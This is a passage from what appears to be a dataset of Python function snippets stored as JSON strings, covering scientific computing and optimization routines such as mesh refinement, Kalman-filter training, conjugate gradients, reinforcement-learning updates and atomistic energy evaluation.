ExecuteInstanceStochasticAdaptiveRefinementAux_Functionality(current_global_index,pickled_coarse_model,pickled_coarse_project_parameters,pickled_custom_metric_refinement_parameters,pickled_custom_remesh_refinement_parameters,random_variable,current_index,current_analysis_stage,previous_computational_time,open_mp_threads,mapping_flag,pickled_mapping_reference_model,print_to_file,filename):\n\n    start_time = time.time()\n    # unpickle model and build Kratos Model object\n    serialized_model = pickle.loads(pickled_coarse_model)\n    current_model = KratosMultiphysics.Model()\n    serialized_model.Load(\"ModelSerialization\",current_model)\n    del(serialized_model)\n    # unpickle parameters and build Kratos Parameters object\n    serialized_project_parameters = pickle.loads(pickled_coarse_project_parameters)\n    current_project_parameters = KratosMultiphysics.Parameters()\n    serialized_project_parameters.Load(\"ParametersSerialization\",current_project_parameters)\n    del(serialized_project_parameters)\n    # refine if current_index > 0; the adaptive refinement is based on the solution of the previous index\n    if (current_index > 0):\n        # unpickle metric and remesh refinement parameters and build Kratos Parameters objects\n        serialized_custom_metric_refinement_parameters = pickle.loads(pickled_custom_metric_refinement_parameters)\n        serialized_custom_remesh_refinement_parameters = pickle.loads(pickled_custom_remesh_refinement_parameters)\n        current_custom_metric_refinement_parameters = KratosMultiphysics.Parameters()\n        current_custom_remesh_refinement_parameters = KratosMultiphysics.Parameters()\n        serialized_custom_metric_refinement_parameters.Load(\"MetricRefinementParametersSerialization\",current_custom_metric_refinement_parameters)\n        serialized_custom_remesh_refinement_parameters.Load(\"RemeshRefinementParametersSerialization\",current_custom_remesh_refinement_parameters)\n        del(serialized_custom_metric_refinement_parameters,serialized_custom_remesh_refinement_parameters)\n        # refine the model Kratos object\n        adaptive_refinement_manager = AdaptiveRefinement(current_index,current_model,current_project_parameters,current_custom_metric_refinement_parameters,current_custom_remesh_refinement_parameters)\n        refined_model,refined_project_parameters = adaptive_refinement_manager.ComputeAdaptiveRefinement()\n        current_model = refined_model\n        del(refined_model,refined_project_parameters)\n    # construct the analysis stage\n    simulation = current_analysis_stage(current_model,current_project_parameters,random_variable)\n    # add the filename if the print_to_file flag is true\n    if (print_to_file):\n        simulation.filename = filename\n    # add flag if current index is maximum index\n    if (current_index == current_global_index):\n        simulation.is_current_index_maximum_index = True\n    else:\n        simulation.is_current_index_maximum_index = False\n    # mapping if in current finest level and mapping flag is true\n    # otherwise standard behavior\n    if (mapping_flag is True and current_index == current_global_index):\n        # unpickle mapping reference model and build Kratos Model object\n        serialized_mapping_reference_model = pickle.loads(pickled_mapping_reference_model)\n        mapping_reference_model = KratosMultiphysics.Model()\n        serialized_mapping_reference_model.Load(\"ModelSerialization\",mapping_reference_model)\n        del(serialized_mapping_reference_model)\n        # send reference model to analysis stage for mapping and set mapping flag to true\n        simulation.mapping_reference_model = mapping_reference_model\n        simulation.mapping = True\n    simulation.Run()\n    # mapping if in current finest
level and mapping flag is true\n # otherwise standard qoi evaluation\n if (mapping_flag is True and current_index == current_global_index):\n qoi = simulation.MappingAndEvaluateQuantityOfInterest()\n else:\n qoi = simulation.EvaluateQuantityOfInterest()\n # save model and parameters as MpiSerializer Kratos objects\n serialized_finer_model = KratosMultiphysics.MpiSerializer()\n serialized_finer_model.Save(\"ModelSerialization\",simulation.model)\n # pickle model and parameters\n pickled_finer_model = pickle.dumps(serialized_finer_model, 2) # second argument is the protocol and is NECESSARY (according to pybind11 docs)\n del(simulation)\n end_time = time.time()\n computational_time = previous_computational_time + open_mp_threads*(end_time-start_time) # multiply by open mp threads to consider real machine cost\n return qoi,pickled_finer_model,computational_time", "def step(self, closure):\r\n self.state['step'] += 1\r\n for y_ind in range(self.dim_out):\r\n err = closure(y_ind)\r\n for group_ind in range(len(self.param_groups)):\r\n group = self.param_groups[group_ind]\r\n iekf_mat = self.state['iekf_groups'][group_ind]\r\n for ii, w in enumerate(group['params']):\r\n if w.grad is None:\r\n continue\r\n H_n = iekf_mat[ii]['H']\r\n grad = w.grad.data.detach()\r\n if len(w.size()) > 1:\r\n grad = grad.transpose(1, 0)\r\n grad = grad.contiguous().view((1, -1))\r\n if y_ind == 0:\r\n H_n = grad\r\n else:\r\n H_n = torch.cat([H_n, grad], dim=0)\r\n self.state['iekf_groups'][group_ind][ii]['H'] = H_n\r\n\r\n err_T = err.transpose(0, 1)\r\n\r\n for group_ind in range(len(self.param_groups)):\r\n group = self.param_groups[group_ind]\r\n iekf_mat = self.state['iekf_groups'][group_ind]\r\n for ii, w in enumerate(group['params']):\r\n if w.grad is None:\r\n continue\r\n\r\n lbd_n = iekf_mat[ii]['lbd']\r\n P_n = iekf_mat[ii]['P']\r\n EPS = iekf_mat[ii]['EPS']\r\n H_n = iekf_mat[ii]['H']\r\n H_n_T = H_n.transpose(0, 1)\r\n if group['lbd_decay']:\r\n miu = 1.0 / min(self.state['step'], group['lbd_max_step'])\r\n lbd_n = lbd_n + miu * (err_T.mm(err).flatten()[0] / self.dim_out - lbd_n)\r\n self.state['iekf_groups'][group_ind][ii]['lbd'] = lbd_n\r\n R_n = lbd_n * torch.eye(self.dim_out, dtype=torch.float, device=iekf_mat[ii]['device'],\r\n requires_grad=False)\r\n\r\n g_n = R_n + H_n.mm(P_n).mm(H_n_T)\r\n g_n = g_n.inverse()\r\n\r\n K_n = P_n.mm(H_n_T).mm(g_n)\r\n delta_w = K_n.mm(err)\r\n if len(w.size()) > 1:\r\n delta_w = delta_w.view((w.size(1), w.size(0))).transpose(1, 0)\r\n else:\r\n delta_w = delta_w.view(w.size())\r\n\r\n new_P = (group['alpha'] + 1) * (P_n - K_n.mm(H_n).mm(P_n) + EPS)\r\n self.state['iekf_groups'][group_ind][ii]['P'] = new_P\r\n\r\n w.data.add_(delta_w)\r\n\r\n return err", "def optimize_library_descent(self, target, direction='max', steps=100,\n multiprocessing=False, ret_info=False,\n args=None):\n # get the target function to call\n target_function = getattr(self, target)\n if args is not None:\n target_function = functools.partial(target_function, **args)\n\n # initialize the optimizer\n value = target_function()\n value_best, state_best = value, self.sens_mat.copy()\n \n if ret_info:\n # store extra information\n start_time = time.time()\n info = {'values': {}}\n values_count = self.parameters['optimizer_values_count']\n values_step = max(1, steps // values_count)\n \n if multiprocessing:\n # run the calculations in multiple processes\n pool_size = self.get_number_of_cores()\n pool = mp.Pool(processes=pool_size)\n if ret_info:\n values_step = max(1, values_step // pool_size)\n 
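            # Sketch of the parallel descent step below: each outer iteration
            # proposes pool_size candidate states, each obtained by flipping a
            # single randomly chosen entry of sens_mat; the candidates are
            # evaluated concurrently via pool.map, the best candidate is
            # compared against value_best, and the winning sensitivity matrix
            # becomes the starting point for the next round of proposals.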
\n # iterate for given number of steps\n for step in range(int(steps) // pool_size):\n joblist = []\n init_arguments = self.init_arguments\n for _ in range(pool_size):\n # modify the current state and add it to the job list\n i = random.randrange(self.sens_mat.size)\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n params = init_arguments['parameters'] \n params['sensitivity_matrix'] = self.sens_mat\n params['initialize_state']['sensitivity'] = 'exact'\n \n joblist.append((copy.deepcopy(init_arguments), target))\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n \n # run all the jobs\n results = pool.map(_run_job, joblist)\n \n # find the best result \n if direction == 'max':\n res_best = np.argmax(results)\n if results[res_best] > value_best:\n value_best = results[res_best]\n state_best = joblist[res_best][0]['parameters']['sensitivity_matrix']\n # use the best state as a basis for the next iteration\n self.sens_mat = state_best\n \n elif direction == 'min':\n res_best = np.argmin(results)\n if results[res_best] < value_best:\n value_best = results[res_best]\n state_best = joblist[res_best][0]['parameters']['sensitivity_matrix']\n # use the best state as a basis for the next iteration\n self.sens_mat = state_best\n \n else:\n raise ValueError('Unsupported direction `%s`' % direction)\n \n if ret_info and step % values_step == 0:\n info['values'][step * pool_size] = results[res_best]\n \n else:\n # run the calculations in this process\n for step in range(int(steps)):\n # modify the current state\n i = random.randrange(self.sens_mat.size)\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n \n # get the value of the new state\n value = target_function()\n \n improved = ((direction == 'max' and value > value_best) or\n (direction == 'min' and value < value_best))\n if improved:\n # save the state as the new best value\n value_best, state_best = value, self.sens_mat.copy()\n else:\n # undo last change\n self.sens_mat.flat[i] = 1 - self.sens_mat.flat[i]\n \n if ret_info and step % values_step == 0:\n info['values'][step] = value_best\n\n # sort the best state and store it in the current object\n state_best = self.sort_sensitivity_matrix(state_best)\n self.sens_mat = state_best.copy()\n\n if ret_info:\n info['total_time'] = time.time() - start_time \n info['states_considered'] = steps\n info['performance'] = steps / info['total_time']\n return value_best, state_best, info\n else:\n return value_best, state_best", "def post_apply(self): #pragma no cover\n for e in self.obs_queue:\n\n # translate operation wire labels to the device's wire labels\n device_wires = self.map_wires(e.wires)\n\n self.measure += \"set resultArray w/= {wires[0]} <- \".format(wires=device_wires.tolist())\n self.measure += self._observable_map[e.name].format(wires=device_wires.tolist())\n self.measure += \" \"\n\n self._source_code = PROGRAM.format(wires=self.num_wires, operations=self.prog, measurements=self.measure)\n self.qs = qsharp.compile(self._source_code)", "def optimize(self, input_val_dict):\n logger.log(\"Start CG optimization\")\n\n logger.log(\"computing loss before\")\n loss_before = self.loss(input_val_dict)\n\n logger.log(\"performing update\")\n\n logger.log(\"computing gradient\")\n gradient = self.gradient(input_val_dict)\n logger.log(\"gradient computed\")\n\n logger.log(\"computing descent direction\")\n Hx = self._hvp_approach.build_eval(input_val_dict)\n descent_direction = conjugate_gradients(Hx, gradient, cg_iters=self._cg_iters)\n\n initial_step_size = np.sqrt(2.0 * 
self._max_constraint_val *\n (1. / (descent_direction.dot(Hx(descent_direction)) + 1e-8)))\n if np.isnan(initial_step_size):\n logger.log(\"Initial step size is NaN! Rejecting the step!\")\n return\n\n initial_descent_step = initial_step_size * descent_direction\n logger.log(\"descent direction computed\")\n\n prev_params = self._target.get_param_values()\n prev_params_values = _flatten_params(prev_params)\n\n loss, constraint_val, n_iter, violated = 0, 0, 0, False\n for n_iter, ratio in enumerate(self._backtrack_ratio ** np.arange(self._max_backtracks)):\n cur_step = ratio * initial_descent_step\n cur_params_values = prev_params_values - cur_step\n cur_params = _unflatten_params(cur_params_values, params_example=prev_params)\n self._target.set_params(cur_params)\n\n loss, constraint_val = self.loss(input_val_dict), self.constraint_val(input_val_dict)\n if loss < loss_before and constraint_val <= self._max_constraint_val:\n break\n\n \"\"\" ------------------- Logging Stuff -------------------------- \"\"\"\n if np.isnan(loss):\n violated = True\n logger.log(\"Line search violated because loss is NaN\")\n if np.isnan(constraint_val):\n violated = True\n logger.log(\"Line search violated because constraint %s is NaN\" % self._constraint_name)\n if loss >= loss_before:\n violated = True\n logger.log(\"Line search violated because loss not improving\")\n if constraint_val >= self._max_constraint_val:\n violated = True\n logger.log(\"Line search violated because constraint %s is violated\" % self._constraint_name)\n\n if violated and not self._accept_violation:\n logger.log(\"Line search condition violated. Rejecting the step!\")\n self._target.set_params(prev_params)\n\n logger.log(\"backtrack iters: %d\" % n_iter)\n logger.log(\"computing loss after\")\n logger.log(\"optimization finished\")", "def optimize5():\n xl = xl_app()\n qt_app = get_qt_app() # pragma noqc\n # Get the initial values of the input cells\n msgBox = OpDialog()\n result = msgBox.exec_()\n if not result: # user cancelled\n return\n\n in_range = get_range(msgBox.in_range.text())\n out_cell = get_range(msgBox.out_cell.text())\n in_values = list(in_range.Value)\n X = np.array([x[0] for x in in_values])\n\n orig_calc_mode = xl.Calculation\n try:\n # switch Excel to manual calculation\n # and disable screen updating\n xl.Calculation = constants.xlManual\n xl.ScreenUpdating = False\n\n # run the minimization routine\n xl_obj_func = partial(obj_func, xl, in_range, out_cell)\n print(f\"X = {X}\")\n result = minimize(xl_obj_func, X, method=\"nelder-mead\")\n in_range.Value = [(float(x),) for x in result.x]\n xl.ScreenUpdating = True\n mbox = QMessageBox()\n mbox.setIcon(QMessageBox.Information)\n mbox.setText(\"Optimization results shown below.\" \"\\nMake changes permanent?\")\n mbox.setWindowTitle(\"Optimization Complete\")\n mbox.setInformativeText(\n \"\\n\".join(\n [\n \"Successful: %s\" % result.success,\n result.message,\n \"After %d iterations\" % result.nit,\n ]\n )\n )\n mbox.setStandardButtons(QMessageBox.Ok | QMessageBox.Cancel)\n yes_no = mbox.exec_()\n if yes_no != QMessageBox.Ok:\n in_range.Value = in_values\n else:\n in_range.Value = [(float(x),) for x in result.x]\n\n finally:\n # restore the original calculation\n # and screen updating mode\n xl.ScreenUpdating = True\n xl.Calculation = orig_calc_mode", "def finalize(self):\n self.report('Finalizing optimization procedure.')\n with self.optimizer() as opt:\n optimal_process_output = opt.result_value\n optimal_process_output.store()\n 
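            # Presumably following the host framework's convention (this reads
            # like an AiiDA workchain), a node must be stored before it can be
            # attached as an output via self.out; result_index then identifies
            # the best evaluation, whose child process is fetched from
            # self.ctx via eval_key so that its uuid is exposed as well.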
self.out('optimal_process_output', optimal_process_output)\n result_index = opt.result_index\n optimal_process = self.ctx[self.eval_key(result_index)]\n self.out('optimal_process_uuid', Str(optimal_process.uuid).store())", "def _optimize(self) -> None:\n\n for i, agent in enumerate(self.agents):\n states, actions, rewards, next_states, dones = self.memory.sample()\n\n actor_next_state = self._agent_states(i, next_states)\n next_actions = torch.cat(\n [a.actor_target(actor_next_state) for a in self.agents], 1\n )\n next_q = agent.critic_target(next_states, next_actions).detach()\n target_q = rewards[:, i].view(-1, 1) + self.gamma * next_q * (\n 1 - dones[:, i].view(-1, 1)\n )\n local_q = agent.critic_local(states, actions)\n\n value_loss = agent.loss_fn(local_q, target_q)\n agent.value_optimizer.zero_grad()\n value_loss.backward()\n agent.value_optimizer.step()\n\n local_actions = []\n for i, a in enumerate(self.agents):\n local_states = self._agent_states(i, states)\n local_actions.append(\n a.actor_local(local_states)\n if a == agent\n else a.actor_local(local_states).detach()\n )\n local_actions = torch.cat(local_actions, 1)\n policy_loss = -agent.critic_local(states, local_actions).mean()\n\n agent.policy_optimizer.zero_grad()\n policy_loss.backward()\n agent.policy_optimizer.step()\n\n self._update_target_model(agent.critic_local, agent.critic_target)\n self._update_target_model(agent.actor_local, agent.actor_target)", "def main_function(self):\n self.ana_cont_probl = cont.AnalyticContinuationProblem(im_axis=self.input_data.mats,\n im_data=self.input_data.value.real,\n re_axis=self.realgrid.grid,\n kernel_mode='freq_bosonic')\n model = np.ones_like(self.realgrid.grid)\n model /= np.trapz(model, self.realgrid.grid)\n\n preblur, bw = self.get_preblur()\n\n sol = self.ana_cont_probl.solve(method='maxent_svd',\n optimizer='newton',\n alpha_determination='chi2kink',\n model=model,\n stdev=self.input_data.error,\n interactive=False, alpha_start=1e10, alpha_end=1e-3,\n preblur=preblur, blur_width=bw)\n\n inp_str = 'atom {}, orb {}, spin {}, blur {}: '.format(self.input_data.atom,\n self.input_data.orbital,\n self.input_data.spin,\n bw)\n all_chis = np.isfinite(np.array([s.chi2 for s in sol[1]]))\n res_str = 'alpha_opt={:3.2f}, chi2(alpha_opt)={:3.2f}, min(chi2)={:3.2f}'.format(\n sol[0].alpha, sol[0].chi2, np.amin(all_chis)\n )\n self.text_output.append(inp_str + res_str)\n alphas = [s.alpha for s in sol[1]]\n chis = [s.chi2 for s in sol[1]]\n\n self.output_data.update(self.realgrid.grid, sol[0].A_opt, self.input_data)\n\n fig, ax = plt.subplots(ncols=2, nrows=2, figsize=(11.75, 8.25)) # A4 paper size\n ax[0, 0].loglog(alphas, chis, marker='s', color='black')\n ax[0, 0].loglog(sol[0].alpha, sol[0].chi2, marker='*', color='red', markersize=15)\n ax[0, 0].set_xlabel(r'$\\alpha$')\n ax[0, 0].set_ylabel(r'$\\chi^2(\\alpha)$')\n\n ax[1, 0].plot(self.realgrid.grid, sol[0].A_opt)\n ax[1, 0].set_xlabel(r'$\\omega$')\n ax[1, 0].set_ylabel('spectrum')\n\n ax[0, 1].plot(self.input_data.mats, self.input_data.value.real,\n color='blue', ls=':', marker='x', markersize=5,\n label='Re[data]')\n ax[0, 1].plot(self.input_data.mats, self.input_data.value.imag,\n color='green', ls=':', marker='+', markersize=5,\n label='Im[data]')\n ax[0, 1].plot(self.input_data.mats, sol[0].backtransform.real,\n ls='--', color='gray', label='Re[fit]')\n ax[0, 1].plot(self.input_data.mats, sol[0].backtransform.imag,\n color='gray', label='Im[fit]')\n ax[0, 1].set_xlabel(r'$\\nu_n$')\n ax[0, 
1].set_ylabel(self.input_data.data_type)\n ax[0, 1].legend()\n\n ax[1, 1].plot(self.input_data.mats, (self.input_data.value - sol[0].backtransform).real,\n ls='--', label='real part')\n ax[1, 1].plot(self.input_data.mats, (self.input_data.value - sol[0].backtransform).imag,\n label='imaginary part')\n ax[1, 1].set_xlabel(r'$\\nu_n$')\n ax[1, 1].set_ylabel('data $-$ fit')\n ax[1, 1].legend()\n plt.tight_layout()\n plt.show()", "def callback(_locals, _globals):\n global n_steps\n # Print stats every 20 calls\n if (n_steps + 1) % 1 == 0:\n # Evaluate policy training performance\n episode_rewards, episode_lengths = evaluate_policy(_locals['self'], eval_real_env,\n n_eval_episodes=n_eval_episodes,\n render=False,\n deterministic=False,\n return_episode_rewards=False)\n print(\"Last mean reward per episode at target: {:.2f}\".format(episode_rewards))\n\n episode_rewards_grnd, episode_lengths_grnd = evaluate_policy(_locals['self'], eval_grnd_env,\n n_eval_episodes=n_eval_episodes,\n render=False,\n deterministic=False,\n return_episode_rewards=False)\n print(\"Last mean reward per episode at grounded environment: {:.2f}\".format(episode_rewards_grnd))\n\n with open(os.path.join(log_dir, 'eval_at_target.txt'), 'a') as f:\n f.write(\"{}, {}, {}\\n\".format(n_steps, episode_rewards, episode_lengths/n_eval_episodes))\n f.close()\n with open(os.path.join(log_dir, 'eval_at_grnd.txt'), 'a') as f:\n f.write(\"{}, {}, {}\\n\".format(n_steps, episode_rewards_grnd, episode_lengths_grnd/n_eval_episodes))\n f.close()\n n_steps += 1\n return True", "def run(self):\n i = 0\n try:\n for i in range(0, self._iters):\n if self._verbose:\n print(\" Inner CG Iteration \" + repr(i))\n\n self._forward(self._p_k, self._v_k)\n sigma_k = measure(self._p_k, self._v_k)\n alpha_k = self._rho_k / sigma_k\n update_m(self._m, alpha_k, self._p_k)\n sub_scaled_vector(self._residual_k, self._residual_k, alpha_k,\n self._v_k)\n self._v_k = gpuarray_copy(self._residual_k)\n rho_k_plus_1 = measure(self._v_k, self._residual_k)\n rho_k_t = np.abs(rho_k_plus_1)\n\n if (rho_k_t / self._rho_0 <= self._relative_tolerance) \\\n or (rho_k_t <= self._absolute_tolerance):\n if self._verbose:\n print(\"Converged at Iteration \" + str(i) + \".\")\n self.converged = True\n self.iteration = i+1\n return\n\n add_scaled_vector(self._p_k, self._v_k,\n rho_k_plus_1/self._rho_k,\n self._p_k)\n self._rho_k = rho_k_plus_1\n\n if self._verbose >= 3:\n print(\" Residual=\" + repr(rho_k_t))\n except KeyboardInterrupt:\n raise\n finally:\n self.iteration = i+1", "def save_cma_optimization_results(self, es):\n # code extra verbose to understand what is going on\n generation = es.result.iterations\n evals = es.result.evaluations # number of evals at start of each gen\n xfavorite = es.result.xfavorite # center of distribution, best est\n stds = es.result.stds # stds of distribution, stds of xfavorite\n fbest = es.result.fbest # best ever measured\n xbest = es.result.xbest # coordinates of best ever measured\n evals_best = es.result.evals_best # index of best measurement\n\n if not self.minimize_optimization:\n fbest = -fbest\n\n results_array = np.concatenate([[generation, evals],\n xfavorite, stds,\n [fbest], xbest, [evals_best]])\n if (not 'optimization_result'\n in self.data_object[EXPERIMENTAL_DATA_GROUP_NAME].keys()):\n opt_res_grp = self.data_object[EXPERIMENTAL_DATA_GROUP_NAME]\n self.opt_res_dset = opt_res_grp.create_dataset(\n 'optimization_result', (0, len(results_array)),\n maxshape=(None, len(results_array)),\n dtype='float64')\n\n # FIXME: Jan 
2018, add the names of the parameters to column names\n self.opt_res_dset.attrs['column_names'] = h5d.encode_to_utf8(\n 'generation, ' + 'evaluations, ' +\n 'xfavorite, ' * len(xfavorite) +\n 'stds, '*len(stds) +\n 'fbest, ' + 'xbest, '*len(xbest) +\n 'best evaluation,')\n\n old_shape = self.opt_res_dset.shape\n new_shape = (old_shape[0]+1, old_shape[1])\n self.opt_res_dset.resize(new_shape)\n self.opt_res_dset[-1, :] = results_array", "def run(self):\n self._fitness = self._fitness_func(self._bitstring, *self._args, **self._kwargs)", "def Optimize(fun, \n dimensions = 10,\n dataType = float64,\n lowerDomain = -5.0,\n upperDomain = 5.0,\n constrainToLower = False,\n constrainToUpper = False,\n maxMutations = 3, \n maxIndexes = 3, \n gamma = 0.99, \n minImprovements = 3,\n scale = 1.0,\n popSize = 10, \n maxIterations = 1000000,\n targetLoss = 1.0e-8,\n minScale = 1.0e-10):\n pop = Population( memberLength = dimensions,\n memberDataType = dataType,\n lowerDomain = lowerDomain, \n upperDomain = upperDomain,\n maxMutations = maxMutations, \n maxIndexes = maxIndexes, \n gamma = gamma, \n minImprovements = minImprovements,\n scale = scale)\n pop.prepare(popSize, fun)\n loss = pop.elite.loss\n startTime = time.time()\n print(f\"[{0:7d}] Loss: {loss:<13.10g} S: {pop.scale:<12.7g} I:{PI(pop.improvements)} elapsed: {0.0:>9.6f} hours\")\n try:\n #-----------------------------------------------------------------\n for trial in range(1, maxIterations):\n pop.minimize(fun, constrainToLower=constrainToLower, constrainToUpper=constrainToUpper)\n if loss > pop.elite.loss:\n loss = pop.elite.loss\n elapsedTime = (time.time() - startTime)/(60*60)\n print(f\"[{trial:7d}] Loss: {loss:<13.10g} S: {pop.scale:<12.7g} I:{PI(pop.improvements)} elapsed: {elapsedTime:>9.6f} hours\")\n if (loss < targetLoss) or (pop.scale < minScale):\n break\n #-----------------------------------------------------------------\n except KeyboardInterrupt:\n pass\n finally:\n print(f\"\\n[{trial:7d}] Loss: {pop.elite.loss:<13.10g} S: {pop.scale:<12.7g} I:{PI(pop.improvements)} elapsed: {elapsedTime:>9.6f} hours\")\n return pop.elite", "def runIteration(self, task, Sol, Fitness, xb, fxb, A, S, Q, v, **dparams):\n\t\tfor i in range(self.NP):\n\t\t\tQ[i] = self.Qmin + (self.Qmax - self.Qmin) * self.uniform(0, 1)\n\t\t\tv[i] += (Sol[i] - xb) * Q[i]\n\t\t\tif self.rand() > self.r: S[i] = self.localSearch(best=xb, A=A[i], task=task, i=i, Sol=Sol)\n\t\t\telse: S[i] = task.repair(Sol[i] + v[i], rnd=self.Rand)\n\t\t\tFnew = task.eval(S[i])\n\t\t\tif (Fnew <= Fitness[i]) and (self.rand() < A[i]): Sol[i], Fitness[i] = S[i], Fnew\n\t\t\tif Fnew <= fxb: xb, fxb, A[i] = S[i].copy(), Fnew, self.updateLoudness(A[i])\n\t\treturn Sol, Fitness, xb, fxb, {'A': A, 'S': S, 'Q': Q, 'v': v}", "def iterate(self, update_func):\n self.pre_loop()\n logger.info('%s: start iterations', self.__class__.__name__)\n with recording_exit_reason(self.datastore):\n for gen_step in range(self.iterations):\n self.post_update(gen_step, update_func(gen_step))\n logger.info('%s: maximum iterations reached', self.__class__.__name__)", "def eval_energy(Optimizer, individ):\n #logger = initialize_logger(Optimizer.loggername)\n logger = logging.getLogger(Optimizer.loggername)\n if 'MAST' in Optimizer.calc_method:\n energy = individ.energy\n bul = individ.bulki\n signal = 'Received MAST structure\\n'\n logger.info('Received individual index = {0} from MAST with energy {1}. 
Returning with no evaluation'.format(\n individ.index, individ.energy))\n else:\n if Optimizer.parallel: \n rank = MPI.COMM_WORLD.Get_rank()\n logger.info('Received individual HI = {0} with energy {1} for energy evaluation'.format(\n individ.history_index, individ.energy))\n STR='----Individual ' + str(individ.history_index)+ ' Optimization----\\n'\n indiv=individ[0]\n if 'EE' in Optimizer.debug:\n debug = True\n else:\n debug = False\n if debug: \n write_xyz(Optimizer.debugfile,indiv,'Received by eval_energy')\n Optimizer.debugfile.flush()\n logger.debug('Writing received individual to debug file')\n # Establish individual structure for evaluation. Piece together regions when necessary.\n if Optimizer.structure=='Defect':\n indi=indiv.copy()\n bulk=individ.bulki\n nat=indi.get_number_of_atoms()\n if debug: \n logger.info('Extending defect structure to include bulk len(r1+r2)={0} len(bulk)={1}'.format(nat,len(bulk)))\n csize=bulk.get_cell() \n totalsol=Atoms(cell=csize, pbc=True)\n totalsol.extend(indi)\n totalsol.extend(bulk)\n for sym,c,m,u in Optimizer.atomlist:\n nc=len([atm for atm in totalsol if atm.symbol==sym])\n STR+='Defect configuration contains '+repr(nc)+' '+repr(sym)+' atoms\\n'\n elif Optimizer.structure=='Surface':\n totalsol=Atoms()\n totalsol.extend(indiv)\n nat=indiv.get_number_of_atoms()\n totalsol.extend(individ.bulki)\n if debug:\n logger.info('Extending surface structure to include bulk len(r1+r2)={0} len(bulk)={1}'.format(nat,len(individ.bulki)))\n for sym,c,m,u in Optimizer.atomlist:\n nc=len([atm for atm in totalsol if atm.symbol==sym])\n STR+='Surface-Bulk configuration contains '+repr(nc)+' '+repr(sym)+' atoms\\n'\n cell=numpy.maximum.reduce(indiv.get_cell())\n totalsol.set_cell([cell[0],cell[1],500])\n totalsol.set_pbc([True,True,False])\n elif Optimizer.structure=='Cluster':\n totalsol = indiv.copy()\n nat = len(totalsol)\n if debug:\n logger.info('Extending cluster with {0} atoms to center of evaluation box of size {1}'.format(nat,Optimizer.large_box_size))\n origcell = indiv.get_cell()\n totalsol.set_cell([Optimizer.large_box_size,Optimizer.large_box_size,Optimizer.large_box_size])\n totalsol.translate([Optimizer.large_box_size/2.0,Optimizer.large_box_size/2.0,Optimizer.large_box_size/2.0])\n elif Optimizer.structure=='Crystal':\n totalsol = indiv.copy()\n nat = len(totalsol)\n else:\n print 'WARNING: In EvalEnergy. 
Optimizer.structure not recognized'\n logger.warning('Optimizer.structure not recognized')\n \n # Check for atoms that are too close or out of constrained location\n if Optimizer.constrain_position:\n if Optimizer.structure=='Defect':\n if debug:\n logger.info('Constraining positions of defect')\n totalsol, stro = constrain_positions(totalsol, Optimizer.solidbulk, Optimizer.sf)\n if debug:\n logger.info(stro)\n STR+=stro\n min_len=0.7\n if not Optimizer.fixed_region:\n if debug:\n logger.info('Running check minimum distance')\n totalsol, STR = check_min_dist(totalsol, Optimizer.structure, nat, min_len, STR)\n if debug:\n write_xyz(Optimizer.debugfile,totalsol,'After minlength check')\n Optimizer.debugfile.flush()\n logger.debug('Writing individual after checking minimum length')\n \n # Set calculator to use to get forces/energies\n if Optimizer.parallel:\n calc = setup_calculator(Optimizer)\n if Optimizer.fixed_region:\n if debug:\n logger.info('Setting up fixed region calculator')\n pms=copy.deepcopy(calc.parameters)\n try:\n pms['mass'][len(pms['mass'])-1] += '\\ngroup RO id >= {0}\\nfix freeze RO setforce 0.0 0.0 0.0\\n'.format(nat)\n except KeyError:\n pms['pair_coeff'][0] += '\\ngroup RO id >= {0}\\nfix freeze RO setforce 0.0 0.0 0.0\\n'.format(nat)\n calc = LAMMPS(parameters=pms, files=calc.files, keep_tmp_files=calc.keep_tmp_files, tmp_dir=calc.tmp_dir)\n lmin = copy.copy(Optimizer.lammps_min)\n if debug:\n logger.info('Setting up no local minimization calculator')\n Optimizer.lammps_min = None\n Optimizer.static_calc = setup_calculator(Optimizer)\n Optimizer.lammps_min = lmin\n else:\n calc=Optimizer.calc\n totalsol.set_calculator(calc)\n totalsol.set_pbc(True)\n \n # Perform Energy Minimization\n if not Optimizer.parallel:\n if debug: \n write_xyz(Optimizer.debugfile,totalsol,'Individual sent to Energy Minimizer')\n logger.debug('Writing structure sent to energy minimizer')\n try:\n cwd = os.getcwd()\n if Optimizer.ase_min == True:\n if debug:\n logger.info('Running ASE minimizer')\n if Optimizer.calc_method=='LennardJones':\n logger.warn('Must run ase LJ calculator with pbc=False')\n totalsol.set_pbc(False)\n totalsol, energy, pressure, volume, STR = run_ase_min(totalsol, Optimizer.ase_min_fmax, Optimizer.ase_min_maxsteps, Optimizer.fitness_scheme, STR)\n else:\n if debug:\n logger.info('Running local energy calculator')\n if Optimizer.fixed_region:\n totalsol, energy, pressure, volume, STR = run_energy_eval(totalsol, Optimizer.calc_method, Optimizer.fixed_region, Optimizer.fitness_scheme, STR, Optimizer.static_calc)\n else:\n totalsol, energy, pressure, volume, STR = run_energy_eval(totalsol, Optimizer.calc_method, False, Optimizer.fitness_scheme, STR)\n except Exception, e:\n logger.critical('Error in energy evaluation: {0}'.format(e), exc_info=True)\n path = os.path.join(cwd,'TroubledLammps')\n if not os.path.exists(path):\n os.mkdir(path)\n #Copy files over\n shutil.copyfile(calc.trajfile,os.path.join(path,os.path.basename(calc.trajfile)))\n shutil.copyfile(calc.infile,os.path.join(path,os.path.basename(calc.infile)))\n shutil.copyfile(calc.logfile,os.path.join(path,os.path.basename(calc.logfile)))\n shutil.copyfile(calc.datafile,os.path.join(path,os.path.basename(calc.datafile)))\n raise RuntimeError('{0}:{1}'.format(Exception,e))\n if not Optimizer.parallel:\n if debug:\n write_xyz(Optimizer.debugfile,totalsol,'Individual after Energy Minimization')\n Optimizer.debugfile.flush()\n logger.debug('Writing structure received from energy minimizer')\n \n # Separate structures 
